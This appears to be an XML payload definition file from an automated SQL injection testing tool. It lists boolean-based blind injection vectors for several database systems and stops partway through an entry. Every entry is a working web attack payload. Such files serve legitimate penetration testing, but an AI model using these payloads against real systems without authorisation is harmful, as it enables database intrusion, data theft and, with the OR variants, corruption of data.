<?xml version="1.0" encoding="UTF-8"?>
<!--
Tag: <test >
SQL injection test definition.
Sub-tag: <title >
Title of the test.
Sub-tag: <stype >
SQL injection family type.
Valid values:
1: Boolean-based blind SQL injection
2: Error-based queries SQL injection
3: Inline queries SQL injection
4: Stacked queries SQL injection
5: Time-based blind SQL injection
6: UNION query SQL injection
Sub-tag: <level >
Minimum level from which this test is performed (higher levels send
more requests per injection point).
Valid values:
1: Always (<100 requests)
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)
Sub-tag: <risk >
Likelihood of the payload damaging data integrity.
NOTE: OR-based payloads are rated 3 (high) in this file because an
OR condition injected into the WHERE clause of an UPDATE or DELETE
statement can make it match every row; enable high-risk tests only
when that is acceptable for the target.
Valid values:
1: Low risk
2: Medium risk
3: High risk
Sub-tag: <clause >
In which clause the payload can work.
NOTE: for instance, some payloads do not need to be tested once it
has been identified whether or not the injection is within a WHERE
clause condition.
Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name
A comma separated list of these values is also possible.
Sub-tag: <where >
Where to add our '<prefix> <payload> <comment> <suffix>' string.
Valid values:
1: Append the string to the parameter original value
2: Replace the parameter original value with a negative random
integer value and append our string
3: Replace the parameter original value with our string
Sub-tag: <vector >
The payload that will be used to exploit the injection point.
Sub-tag: <request >
What to inject for this test.
Sub-tag: <payload >
The payload to test for.
Sub-tag: <comment >
Comment to append to the payload, before the suffix.
Sub-tag: <char >
Character to use to bruteforce number of columns in UNION
query SQL injection tests.
Sub-tag: <columns >
Range of columns to test for in UNION query SQL injection
tests.
Sub-tag: <response >
How to identify if the injected payload succeeded.
Sub-tag: <comparison >
Perform a request with this string as the payload and compare
the response with the <payload > response. Apply the comparison
algorithm.
NOTE: useful to test for boolean-based blind SQL injections.
Sub-tag: <grep >
Regular expression to grep for in the response body.
NOTE: useful to test for error-based SQL injection.
Sub-tag: <time >
Time in seconds to wait before the response is returned.
NOTE: useful to test for time-based blind and stacked queries
SQL injections.
Sub-tag: <union >
Calls unionTest() function.
NOTE: useful to test for UNION query (inband) SQL injection.
Sub-tag: <details >
Which details can be inferred if the payload succeeds.
Sub-tags: <dbms >
What is the database management system (e.g. MySQL).
Sub-tags: <dbms_version >
What is the database management system version (e.g. 5.0.51).
Sub-tags: <os >
What is the database management system underlying operating
system.
<test >
<title > </title>
<stype > </stype>
<level > </level>
<risk > </risk>
<clause > </clause>
<where > </where>
<vector > </vector>
<request >
<payload > </payload>
<comment > </comment>
<char > </char>
<columns > </columns>
</request>
<response >
<comparison > </comparison>
<grep > </grep>
<time > </time>
<union > </union>
</response>
<details >
<dbms > </dbms>
<dbms_version > </dbms_version>
<os > </os>
</details>
</test>
-->
<root >
<!-- Boolean-based blind tests - WHERE/HAVING clause. NOTE: the OR variants carry risk 3 because an OR condition injected into the WHERE clause of an UPDATE or DELETE statement can match every row -->
<test >
<title > AND boolean-based blind - WHERE or HAVING clause</title>
<stype > 1</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test >
<title > OR boolean-based blind - WHERE or HAVING clause</title>
<stype > 1</stype>
<level > 1</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
<vector > OR [INFERENCE]</vector>
<request >
<payload > OR [RANDNUM]=[RANDNUM]</payload>
</request>
<response >
<comparison > OR [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test >
<title > AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype > 1</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
<comment > -- -</comment>
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test >
<title > OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype > 1</stype>
<level > 2</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
<vector > OR [INFERENCE]</vector>
<request >
<payload > OR [RANDNUM]=[RANDNUM]</payload>
<comment > -- -</comment>
</request>
<response >
<comparison > OR [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test >
<title > AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
<comment > #</comment>
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
<vector > OR [INFERENCE]</vector>
<request >
<payload > OR [RANDNUM]=[RANDNUM]</payload>
<comment > #</comment>
</request>
<response >
<comparison > OR [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
<comment > %16</comment>
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
<vector > OR [INFERENCE]</vector>
<request >
<payload > OR [RANDNUM]=[RANDNUM]</payload>
<comment > %16</comment>
</request>
<response >
<comparison > OR [RANDNUM]=[RANDNUM1]</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
<stype > 1</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
<request >
<payload > RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
</request>
<response >
<comparison > RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND MAKE_SET([INFERENCE],[RANDNUM])</vector>
<request >
<payload > AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
<vector > OR MAKE_SET([INFERENCE],[RANDNUM])</vector>
<request >
<payload > OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND ELT([INFERENCE],[RANDNUM])</vector>
<request >
<payload > AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
<vector > OR ELT([INFERENCE],[RANDNUM])</vector>
<request >
<payload > OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND ([INFERENCE])*[RANDNUM]</vector>
<request >
<payload > AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
</request>
<response >
<comparison > AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
<vector > OR ([INFERENCE])*[RANDNUM]</vector>
<request >
<payload > OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
</request>
<response >
<comparison > OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
<!-- Boolean-based blind tests - Parameter replace -->
<test >
<title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
<stype > 1</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test >
<title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test >
<title>MySQL &lt; 5.0 boolean-based blind - Parameter replace</title>
<stype > 1</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version>&lt; 5.0</dbms_version>
</details>
</test>
<test >
<title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version>&lt; 5.0</dbms_version>
</details>
</test>
<test >
<title > MySQL boolean-based blind - Parameter replace (MAKE_SET)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > MAKE_SET([INFERENCE],[RANDNUM])</vector>
<request >
<payload > MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
<request >
<payload > MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
</request>
<response >
<comparison > MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL boolean-based blind - Parameter replace (ELT)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > ELT([INFERENCE],[RANDNUM])</vector>
<request >
<payload > ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response >
<comparison > ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > ELT([INFERENCE],[ORIGVALUE])</vector>
<request >
<payload > ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
</request>
<response >
<comparison > ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL boolean-based blind - Parameter replace (bool*int)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > ([INFERENCE])*[RANDNUM]</vector>
<request >
<payload > ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
</request>
<response >
<comparison > ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > ([INFERENCE])*[ORIGVALUE]</vector>
<request >
<payload > ([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
</request>
<response >
<comparison > ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL boolean-based blind - Parameter replace</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
<test >
<title > PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
<request >
<payload > (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
</request>
<response >
<comparison > (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
<test >
<title > PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
<request >
<payload > (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
</request>
<response >
<comparison > (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle boolean-based blind - Parameter replace</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Microsoft Access boolean-based blind - Parameter replace</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > IIF([INFERENCE],[RANDNUM],1/0)</vector>
<request >
<payload > IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)</payload>
</request>
<response >
<comparison > IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > Microsoft Access boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
<request >
<payload > IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
</request>
<response >
<comparison > IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > SAP MaxDB boolean-based blind - Parameter replace</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request >
<payload > (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response >
<comparison > (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
<title > SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request >
<payload > (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response >
<comparison > (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
<test >
<title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
<stype > 1</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test >
<title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test >
<title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > < 5.0</dbms_version>
</details>
</test>
<test >
<title > MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > < 5.0</dbms_version>
</details>
</test>
<test >
<title > PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title>
<stype > 1</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
<request >
